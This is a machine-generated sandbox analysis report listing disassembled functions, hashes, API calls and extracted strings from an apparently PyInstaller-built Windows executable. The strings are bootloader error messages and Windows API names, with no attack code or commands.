                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 3215553584-0
                                                        • Opcode ID: cf493e245973df117cfb9bdb4be30e1b7cc3e093745a0bb3aa436662ba277ffd
                                                        • Instruction ID: 6b2767c6ddc213650f03c995a2bdbfed7abf48ffa3f747ce7439354d141f9efb
                                                        • Opcode Fuzzy Hash: cf493e245973df117cfb9bdb4be30e1b7cc3e093745a0bb3aa436662ba277ffd
                                                        • Instruction Fuzzy Hash: 2531C725A98659A5F741BB11880337CE750AF80B62FC101B9EE2D473D2CE7CE441AB30
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                        • String ID:
                                                        • API String ID: 3947729631-0
                                                        • Opcode ID: faec72fd928e516d4d760f4a89c99e996b8e0a7f11e884b20412009018256aa7
                                                        • Instruction ID: f333402bb754fef76d99fca79eebd3071a99fe6103a169b4c8a6a30c81e987be
                                                        • Opcode Fuzzy Hash: faec72fd928e516d4d760f4a89c99e996b8e0a7f11e884b20412009018256aa7
                                                        • Instruction Fuzzy Hash: 8D21BC36A047499AFB60BF64C8422FC73A4EB04718F841639E62C47AC5DF38D484DB60
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 3215553584-0
                                                        • Opcode ID: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                        • Instruction ID: 8201008df1a4bbf7002efac873fa992f820b9b52991f5db7dd88d28e22a31a7b
                                                        • Opcode Fuzzy Hash: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                        • Instruction Fuzzy Hash: 25118425E5C64991FA60BF11D503279E360FF85B80F8845B9EA8D47A86DF7CD440A720
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 3215553584-0
                                                        • Opcode ID: c0ad99c40d53020ccb328d164a39266f2dfd48b33636b9c7a3122610519525da
                                                        • Instruction ID: 5150b45bfeace3e5f3ef5b65a1581e8a39efc455fc8f095046e0815bba6db3db
                                                        • Opcode Fuzzy Hash: c0ad99c40d53020ccb328d164a39266f2dfd48b33636b9c7a3122610519525da
                                                        • Instruction Fuzzy Hash: 23219536A08A4196FB61BF28E44337AB7A0EB84F54F944234EA5D476D9DF3DD801DB10
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 3215553584-0
                                                        • Opcode ID: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
                                                        • Instruction ID: 0305085056023d59a0a55e85421aca69e337a296583bdba41f6f112fce73c0e4
                                                        • Opcode Fuzzy Hash: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
                                                        • Instruction Fuzzy Hash: CE01DB25A8874950FA14FF569903079E7A5BF85FE0F8846B9DE6C17BDACE3CD4015310
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 3215553584-0
                                                        • Opcode ID: af50f55acc611b54009b4ea4d598cf3424078558251c62237d26469a9987366e
                                                        • Instruction ID: 99e670fcd19cf1c7b3ad865664280ccc4e6b4129534473edc77bf6926aee1118
                                                        • Opcode Fuzzy Hash: af50f55acc611b54009b4ea4d598cf3424078558251c62237d26469a9987366e
                                                        • Instruction Fuzzy Hash: 9F018468E8D64B60FE547B61A943175F2A1AF427A0FD405FCE92D42AC6DE2CE4417230
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF73AE2B9A6,?,?,?,00007FF73AE2AB67,?,?,00000000,00007FF73AE2AE02), ref: 00007FF73AE2F1AD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 3903a8e07e771c3ce20f22a7cfda351bfc6825da59dd5d1b3ed6874a84ef80bd
                                                        • Instruction ID: d6bed0654ef0c4690bb3f1e59aa5d467a9a5098281e12168a0c3deb2915d2e49
                                                        • Opcode Fuzzy Hash: 3903a8e07e771c3ce20f22a7cfda351bfc6825da59dd5d1b3ed6874a84ef80bd
                                                        • Instruction Fuzzy Hash: 69F0F95DF8960EA1FE547661D9132B9D2915F88B40FCC44B9CD0E863D2DE5CE491A330
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(?,?,?,00007FF73AE20D24,?,?,?,00007FF73AE22236,?,?,?,?,?,00007FF73AE23829), ref: 00007FF73AE2DBFA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 4a58605cc4c1e1369a1067e1172dc77d995423b1642967883a658540b08b4ee9
                                                        • Instruction ID: 384d18f9ae6dcfb1bd8c775481e7dc2a2917044286d3bb88712fe211c470a4e3
                                                        • Opcode Fuzzy Hash: 4a58605cc4c1e1369a1067e1172dc77d995423b1642967883a658540b08b4ee9
                                                        • Instruction Fuzzy Hash: 81F0820CF8C24F61FE5477A159932B5D2909F84B61FC807B8DE2E862C1DDACE440A330
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 3215553584-0
                                                        • Opcode ID: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
                                                        • Instruction ID: 8544e02b8f07b61f99bb7c7b811476e16c352fd30f8829b6be4e221330f28b1c
                                                        • Opcode Fuzzy Hash: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
                                                        • Instruction Fuzzy Hash: 07E0EC6CE8930E62FA15BAA04A831B9E2204F55342FC444BCDA194A2D3EE1C6C557632
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: DirectoryErrorLastRemove
                                                        • String ID:
                                                        • API String ID: 377330604-0
                                                        • Opcode ID: 24b2c4150c1d5606f670cbde58673d25452eaf2973990e0a8e410a01c1b9a188
                                                        • Instruction ID: 7b223e1567642d96d7edc357184de44fd76ccf651ede5e5846b50f44c2f7ce6b
                                                        • Opcode Fuzzy Hash: 24b2c4150c1d5606f670cbde58673d25452eaf2973990e0a8e410a01c1b9a188
                                                        • Instruction Fuzzy Hash: 8D41A81AE5C69551F611BB24D5032FCA360FBA5744F8462B2DB8D42153EF2CA6C8D310
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: AddressProc
                                                        • String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                        • API String ID: 190572456-4266016200
                                                        • Opcode ID: cf77275b4bf0387ff900e5ea28e17749df250fc4abdfb995cff073003fe970f9
                                                        • Instruction ID: d7640305df51794c30c074dc39ca86e62bbc347124fa052c5da771a1cc02f081
                                                        • Opcode Fuzzy Hash: cf77275b4bf0387ff900e5ea28e17749df250fc4abdfb995cff073003fe970f9
                                                        • Instruction Fuzzy Hash: 9012A76DE8AB23B0FA55BB18E857174A3B5AF44B40BC454F5C82E06394EF7DE548E230
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                        • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                        • API String ID: 2446303242-1601438679
                                                        • Opcode ID: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
                                                        • Instruction ID: 9c0ec317c2ea325c16af9625983db9644d0e256cd05690878e778d5bfd65b82a
                                                        • Opcode Fuzzy Hash: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
                                                        • Instruction Fuzzy Hash: 29A18B3A608B85A7E714AF12E45679AB360F788B84F904125DB9E03B64DF7EE164CB10
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                        • API String ID: 808467561-2761157908
                                                        • Opcode ID: 462ebf29a53f9f8e0898a565754c8078d18c0a01f6b8af8c35fed8b76f3e05ac
                                                        • Instruction ID: 0e8d9d728f414f25d98c701e053dacbc346afcb4869883b23bb4d56974f2e3e6
                                                        • Opcode Fuzzy Hash: 462ebf29a53f9f8e0898a565754c8078d18c0a01f6b8af8c35fed8b76f3e05ac
                                                        • Instruction Fuzzy Hash: 08B22177E582829BF725AE24C4437FCB3A1FB50B89F801175DA1A57BC4DB39E9009B60
                                                        APIs
                                                        • GetLastError.KERNEL32(00000000,00007FF73AE12A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF73AE1101D), ref: 00007FF73AE18587
                                                        • FormatMessageW.KERNEL32 ref: 00007FF73AE185B6
                                                        • WideCharToMultiByte.KERNEL32 ref: 00007FF73AE1860C
                                                          • Part of subcall function 00007FF73AE129E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF73AE187F2,?,?,?,?,?,?,?,?,?,?,?,00007FF73AE1101D), ref: 00007FF73AE12A14
                                                          • Part of subcall function 00007FF73AE129E0: MessageBoxW.USER32 ref: 00007FF73AE12AF0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                        • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstallem: FormatMessageW failed.$PyInstallem: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                        • API String ID: 2920928814-3505189403
                                                        • Opcode ID: 6472fed7a38855fe53d018715946baf175a16c93e2266fbaa2446d02f1e91665
                                                        • Instruction ID: 8d6dcccf1453b78801e368f19ac3148567b5ec1be63d380d8cee44f4fe7d55d4
                                                        • Opcode Fuzzy Hash: 6472fed7a38855fe53d018715946baf175a16c93e2266fbaa2446d02f1e91665
                                                        • Instruction Fuzzy Hash: 6021A138A58A42A1F720BB11E893265A364FF88784FC401B5E64D836E4EF3CD105E720
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 2f0e84db8cb7341a902ef28a41a93ef6eb2637ed36960dc0fb1294147411c1b9
                                                        • Instruction ID: 3a68d51178e6d750348ce81551c10833faf2a5a834e72c8636c8ce1b9084e8aa
                                                        • Opcode Fuzzy Hash: 2f0e84db8cb7341a902ef28a41a93ef6eb2637ed36960dc0fb1294147411c1b9
                                                        • Instruction Fuzzy Hash: D8318076A08B9196FB60AF60E8423EDB364FB84744F80407ADB4E47A94DF38C648C720
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 4ac1c30ff9e2098ff7eaac683efdfbba3e64979dbffe5e0d25534f02cf004e64
                                                        • Instruction ID: d1c0999bfeeb4ff26015a5513bc68c50201dea3c89db0736b2bf0fa5ab3b1736
                                                        • Opcode Fuzzy Hash: 4ac1c30ff9e2098ff7eaac683efdfbba3e64979dbffe5e0d25534f02cf004e64
                                                        • Instruction Fuzzy Hash: EC31A436A58B8196EB60FF24E8422AEB3A4FB88754F900175EA8D43B94DF3CD145CB10
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: FileFindFirst_invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 2227656907-0
                                                        • Opcode ID: e601e72e586d0b4de4a5ebf73eb2eb015632a136167348e3e84c4a74a70f75b2
                                                        • Instruction ID: 4942ba5c54bef0dbdcc31a82b268b02d12176caa1ca138402fb5ee1b2b2ce030
                                                        • Opcode Fuzzy Hash: e601e72e586d0b4de4a5ebf73eb2eb015632a136167348e3e84c4a74a70f75b2
                                                        • Instruction Fuzzy Hash: 09B1E12AF9868651FA64BB2599031B9E390EF54FD0F844175EA9E07BC8DF3DE441E320
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
